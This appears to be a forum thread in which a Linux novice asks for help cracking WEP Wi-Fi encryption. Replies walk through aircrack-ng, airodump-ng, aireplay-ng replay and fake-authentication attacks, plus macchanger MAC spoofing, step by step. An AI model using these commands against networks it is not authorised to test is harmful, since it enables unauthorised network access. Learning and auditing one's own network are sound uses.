I've tried everything...Help please
I am a noob when it comes to Linux and command line. (I am trying my best to learn with no success)
Now that's said, I have read a hundred tutorials trying to crack WEP. With every attempt I crack and burn. I first started with Ubuntu using aircrack-ng and kismet (which I came to the channel hoping problem). Then after days of trying several different tutorials I gave up declaring my iwl3945 chipset was the problem and I ordered a rosewill usb adapter with a r8187 chipset. From there I still couldn't figure out the channel hoping issue and decided Back Track might be easier. Well I was wrong again. For starters I cant get kismet to work (its probably not configured and i don't know how). I have two wireless adapters and don't know which to use. I have no idea about how to do this being that I never progressed much past monitor mode and failed miserably at that too. I have been trying this for two weeks without success.
If I could get one of you geniuses to walk me through all of this it would be greatly appreciated.
Go back to your ubuntu, use a dumping program which is part of the aircrack suite rather than kismet, specifically the -c switch for it, and then go follow one of the hundreds of video's on google.
Removal of the channel hopping should solve most of your issues. Don't forget monitor mode.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Start with airmon-ng. This will display both wireless adapters and their subsequent chipsets, from here you should be able to see which one is the rosewill. Set that one to monitor:
This will start the device in monitor mode.Code:airmon-ng start [device]
From here you can run airodump-ng:
Once you've found the BSSID you're trying to crack ctrl+c to return to the prompt so you can narrow down to just that BSSID and the channel it resides on (shows in the airodump headers), to do this do something like:Code:airodump-ng [device]
This will lock the bssid and the channel it's on which will help your hoping problems. It will also write all the IVs you receive to [filename]-01.cap in the current directory you ran airodump-ng from. From here you can begin to run your aireplay attacks, I suggest looking in the how-to and tutorial sections of the forum here, there are numerous examples of how to go from here.Code:airodump-ng [device] --bssid [router mac address] -w [filename] -c [channel]
i used aireplay-ng to ping a router for unique IVs then used airodump-ng at the same time on the one channel and one ssid (by defualt it hops over many channels). i ran them both all night on a laptop and by the time i got 500k IVs i cracked it with aircrack-ng in two seconds,
and that was my first wep crack
Ok, I finally did it, I'm not sure what I did right, but I did it. But I only used the r8187 chipset.
Btw, thanks Aspekt9
So what I did was:
To enter monitor mode
1. airmon-ng start (device)
To find the networt name and mac
2. airodump-ng (device)
To find my mac
3.ifconfig
?
4. airodump-ng (device) –bssid (router mac) -w (filename) -c (channel)
?
5.xterm -hold -e "aireplay-ng -3 -b (router mac) -h (my mac) (device)" &
?
6.xterm -hold -e "aireplay-ng -1 6000 -o 1 -q 10 -e "(network name)" -a (router mac) -h (my mac) (device)" &
To crack the code (i guess)???
7.xterm -hold -e "aircrack-ng -z (filename)*cap" &
And there was the key to my network
Could y'all do me a big favor and help clean this up, and explain what I did?
I greatly appreciate everyones help so far and would greatly appreciate any further help.....
So to summarize using your steps:
This command puts the device in monitor mode so we can monitor incoming IVs:
To find the networt name and BSSID (router mac address):Code:airmon-ng start [device]
To find source (our) mac addressCode:airodump-ng [device]
note: to cut down on time having to memorize or copy and paste the mac address all the time we can change our mac before entering monitor mode by usingCode:ifconfig or macchanger --show [device]
To lock onto our BSSID and the channel our BSSID is on, as well as write all the incoming IVs to a file, we use the following command:Code:macchanger --mac 00:11:22:33:44:55 [device]
Replay packets from a wireless client which is currently associated with the AP (which is us since this is a clientless attack) and attempt to generate new IVs.Code:airodump-ng [device] –bssid [router mac] -w [filename] -c [channel]
Since this is a clientless attack, we need to be sure we're associated to the AP that we're trying to generate IVs from, to do this we use Fake Authentication to authenticate us to the AP:Code:aireplay-ng -3 -b [router mac] -h [my mac] [device]
Code:aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]
To crack the key we use:
note: you can also specify -n 64,128 depending on the key length. (128 is default)Code:aircrack-ng -z (filename)*cap
Thanks agian.
Now I have another question. In lots of tutorials I have read there isn't much explanation of how long you run?And do you close it with ctrl+c or just let it run till you've cracked the code?Code:airodump-ng [device] –bssid [router mac] -w [filename] -c [channel]
I'm wondering the same about this?And on this one you only have to run it till you get successful authentication right?Code:aireplay-ng -3 -b [router mac] -h [my mac] [device]Code:aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]
Ok, so I think I figured it out after playing with is a little bit. So you run the airodump, and both the aireplay commands at the same time to capture the IV's? Without the fake authentication it will capture the IV's, but it does so real slow.
Everyone is telling you to start with this or start with that, but not one has bothered to mention that you should start with the manual pages.Originally Posted by kraziejason
The actual instructions from the APP dev's. It will really make a huge difference if you take 20-30 minutes to read and understand what is going on.
tutorial [Aircrack-ng]
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
Linux is really confusing for me too.
Posting Permissions
